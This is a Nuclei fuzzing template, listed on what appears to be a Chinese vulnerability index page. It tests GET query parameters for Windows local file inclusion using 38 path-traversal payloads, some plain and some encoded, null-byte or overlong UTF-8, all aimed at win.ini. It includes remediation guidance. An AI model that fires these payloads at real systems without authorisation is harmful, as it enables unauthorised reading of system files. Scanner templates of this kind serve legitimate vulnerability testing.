windows-lfi-fuzz: Local File Inclusion - Windows

日期: 2025-08-01 | 影响软件: windows | POC: 已公开

漏洞描述

PoC代码[已公开]

# Nuclei DAST (fuzzing) template: substitutes Windows path-traversal strings
# into the query parameters of GET requests and reports a hit when the response
# body looks like the contents of win.ini. A match means a request parameter
# reaches a file-read API without the resolved path being confined to an
# allowed directory.
#
# Remediation for a finding: resolve the requested path to its canonical form
# after all decoding and verify it is still inside the intended base directory,
# or map request values to files through an allow-list. String filters for
# '../' are not sufficient, as the encoded variants in the payload lists show.
id: windows-lfi-fuzz

info:
  name: Local File Inclusion - Windows
  author: pussycat0x
  severity: high
  metadata:
    # NOTE(review): the payload lists below hold 38 entries (8 + 16 + 14);
    # confirm how this request count was derived.
    max-request: 39
  tags: lfi,windows,dast,vuln

http:
  # Only requests whose method is GET are fuzzed.
  - pre-condition:
      - type: dsl
        dsl:
          - 'method == "GET"'

    payloads:
      # Payloads are grouped into three tiers; presumably the tier in use is
      # selected by the scanner's fuzz-aggression setting — confirm against the
      # nuclei version in use. Every string is single-quoted, so backslashes
      # and percent signs are literal characters, not YAML escapes.
      win_fuzz:
        # Plain traversal forms: backslash-rooted path, '../' runs of varying
        # depth, repeated slashes, the '....//' form, and %2f-encoded separators.
        low:
          - '\WINDOWS\win.ini'
          - '../../windows/win.ini'
          - '....//....//windows/win.ini'
          - '../../../../../windows/win.ini'
          - '/..///////..////..//////windows/win.ini'
          - '/../../../../../../../../../windows/win.ini'
          - './../../../../../../../../../../windows/win.ini'
          - '..%2f..%2f..%2f..%2fwindows/win.ini'
        # Adds %00 (null byte) suffixes, the legacy \WINNT directory, three- and
        # four-dot segments, overlong UTF-8 dots (%c0%ae) and double-encoded
        # dots (%252e).
        medium:
          - '\WINDOWS\win.ini%00'
          - '\WINNT\win.ini'
          - '\WINNT\win.ini%00'
          - 'windows/win.ini%00'
          - '/...\...\...\...\...\...\...\...\...\windows\win.ini'
          - '/.../.../.../.../.../.../.../.../.../windows/win.ini'
          - '/..../..../..../..../..../..../..../..../..../windows/win.ini'
          - '/....\....\....\....\....\....\....\....\....\windows\win.ini'
          - '\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\Windows\\\\win.ini'
          - '/..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cwindows/win.ini'
          - '/../../../../../../../../../../../../../../../../&location=Windows/win.ini'
          - '..%2f..%2f..%2f..%2f..%2fwindows/win.ini'
          - '..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini'
          - '/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini'
          - '/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini%00'
          - '..%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/windows/win.ini'
        # Longer chains mixing %5c/%2f separators, double encoding (%255c,
        # %252e, %%32%65) and overlong UTF-8 slashes (%c0%af).
        high:
          - '..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini'
          - '/.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./windows/win.ini'
          - '.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/windows/win.ini'
          - '/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../windows/win.ini'
          - '/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows/win.ini'
          - '/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini'
          - '%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cWindows%5cwin.ini'
          - '%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini'
          - '/%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2ewindows/win.ini/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/windows/win.ini'
          - '/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows\win.ini'
          - '..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini'
          - '/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini'
          - '%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini'
          - '%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fwindows%5Cwin.ini'

    # Coverage is limited to the query string: path segments, headers, cookies
    # and body parameters are not fuzzed by this template.
    fuzzing:
      - part: query
        type: replace # replaces existing parameter value with fuzz payload
        mode: multiple # replaces all parameters value with fuzz payload
        fuzz:
          - '{{win_fuzz}}'

    # Stop sending further payloads once one of them matches.
    stop-at-first-match: true
    # All three words must appear in the response body (condition: and). They
    # correspond to the text of a default win.ini ("; for 16-bit app support",
    # "[fonts]", "[extensions]"). No status-code or content-type check is
    # applied, so any page containing all three words also matches, and a
    # customised or missing win.ini produces no match; treat a negative result
    # as inconclusive rather than as proof the parameter is safe.
    matchers:
      - type: word
        part: body
        words:
          - "bit app support"
          - "fonts"
          - "extensions"
        condition: and
# NOTE(review): the digest line below is the template's signature and was
# computed over the original text; any edit to this file (comments included)
# presumably requires re-signing before signature verification will pass.
# digest: 4a0a0047304502202c7451a1d8e2ce336cd69b4339d8bf006429f0251b6d195fcfeb02472188f3d5022100a1ad317fa882c654e50b3ece6492c6050dad00010369259be8ef2258e4bc4a18:922c64590222798bb761d5b6d8e72950
